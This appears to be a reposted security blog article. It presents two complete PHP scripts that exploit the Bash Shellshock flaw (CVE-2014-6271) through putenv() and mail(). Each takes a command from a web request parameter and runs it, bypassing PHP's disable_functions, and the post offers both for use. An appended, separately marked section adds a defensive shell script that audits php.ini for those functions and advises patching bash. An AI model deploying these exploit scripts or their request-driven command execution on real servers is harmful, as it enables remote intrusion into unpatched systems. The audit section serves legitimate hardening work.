
PHP 5.x and GNU Bash

Author: user  Source: Internet  Date: 2017-12-01 17:15:22



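Back when the ImageMagick vulnerability was getting a lot of attention, this site reposted an article on using that vulnerability to bypass the disable_functions restriction. The article is linked here: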

Bypassing disable_function with the ImageMagick vulnerability

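While browsing around recently I came across this script on 70sec. Researchers abroad published it long ago, we just had not been using it, so I am passing it along to everyone.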

Test environment: PHP 5.3.2, bash 4.1.2, CentOS 6

php.ini contains the following setting:

    disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source

Bypass1 script code

    <?php
    // Exploit Title: PHP 5.x and GNU Bash <= 4.3 Shellshock Exploit
    // Date: 22/11/2014
    // Exploit Author: ssbostan
    // Vendor Homepage: http://www.gnu.org/software/bash/
    // Software Link: http://ftp.gnu.org/gnu/bash/
    // Version: <= 4.3
    // Tested on: Fedora 17, Ubuntu 8.04
    // CVE: http://www.cvedetails.com/cve/CVE-2014-6271/
    echo "Disabled functions: ".ini_get('disable_functions')."\n";
    if(isset($_GET["cmd"]) && !empty($_GET["cmd"]))
    {
        $file=tempnam("/tmp", "xpl");
        putenv("PHP_XPL=() { :;}; {$_GET["cmd"]}>{$file}");
        mail("[email protected]", "", "", "", "-bv");
        echo '<pre>';
        echo file_get_contents($file);
        echo '</pre>';
        unlink($file);
    }
    ?>

Bypass2 script code

    <?php
    # Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
    # Google Dork: none
    # Date: 10/31/2014
    # Exploit Author: Ryan King (Starfall)
    # Vendor Homepage: http://php.net
    # Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
    # Version: 5.* (tested on 5.6.2)
    # Tested on: Debian 7 and CentOS 5 and 6
    # CVE: CVE-2014-6271
    echo "Disabled functions: ".ini_get('disable_functions')."\n";
    function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283
        if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
            $tmp = tempnam(".","data");
            putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
            // In Safe Mode, the user may only alter environment variables whose names
            // begin with the prefixes supplied by this directive.
            // By default, users will only be able to set environment variables that
            // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
            // PHP will let the user modify ANY environment variable!
            mail("[email protected]","","","","-bv"); // -bv so we don't actually send any mail
        }
        else return "Not vuln (not bash)";
        $output = @file_get_contents($tmp);
        @unlink($tmp);
        if($output != "") return $output;
        else return "No output, or not vuln.";
    }
    echo '<pre>';
    echo shellshock($_REQUEST["cmd"]);
    echo '</pre>';
    ?>

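The two scripts do the same thing and differ only slightly in how they are written, so you can use either one. The result is shown in the figure: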

[Image: PHP 5.x and GNU Bash]
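Both scripts above reach the shell through putenv() and mail(), and the disable_functions list quoted on this page blocks neither of them. The audit script below is an added example, not part of the original post or of either exploit author's code; its function names and the sample input are constructed for illustration.

```shell
#!/bin/sh
# Added example: not from the original page.
# Reports which functions the two scripts depend on are still callable
# under a given php.ini, and whether /bin/sh is a symlink to bash.
NEEDED="putenv mail"   # taken from the calls made by both scripts

# Constructed sample input: the disable_functions line quoted on the page.
PAGE_INI='disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source'

# Read php.ini text on stdin and print the disable_functions value, lowercased,
# with quotes and whitespace removed. Lines commented out with ';' do not match
# and a trailing '; comment' is cut off.
# Assumption: if the directive is repeated, the last occurrence is the one used.
disabled_list() {
    sed -n 's/^[[:space:]]*disable_functions[[:space:]]*=\([^;]*\).*/\1/p' \
        | tail -n 1 | tr -d '[:space:]"'"'" | tr 'A-Z' 'a-z'
}

# Print the functions in NEEDED that the php.ini on stdin leaves enabled.
still_enabled() {
    list=",$(disabled_list),"
    out=""
    for fn in $NEEDED; do
        case "$list" in
            *",$fn,"*) ;;                    # disabled
            *) out="${out:+$out }$fn" ;;     # still callable
        esac
    done
    printf '%s\n' "$out"
}

# True when the path (default /bin/sh) is a symlink to bash, the same
# precondition Bypass2 checks with readlink().
sh_is_bash() {
    case "$(readlink "${1:-/bin/sh}" 2>/dev/null)" in
        *bash*) return 0 ;;
        *) return 1 ;;
    esac
}

# Report for a php.ini path, or for the page's sample when no path is given.
audit() {
    if [ -n "${1:-}" ]; then gaps=$(still_enabled < "$1")
    else gaps=$(printf '%s\n' "$PAGE_INI" | still_enabled); fi
    if sh_is_bash; then shell="bash"; else shell="not a bash symlink"; fi
    echo "/bin/sh: $shell; functions still enabled: ${gaps:-none}"
}

audit "${1:-}"
```

Saved under a name such as audit.sh (hypothetical), it takes the php.ini path as its only argument. An empty result closes this particular route inside PHP; updating bash to a release patched for CVE-2014-6271 removes the underlying flaw.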
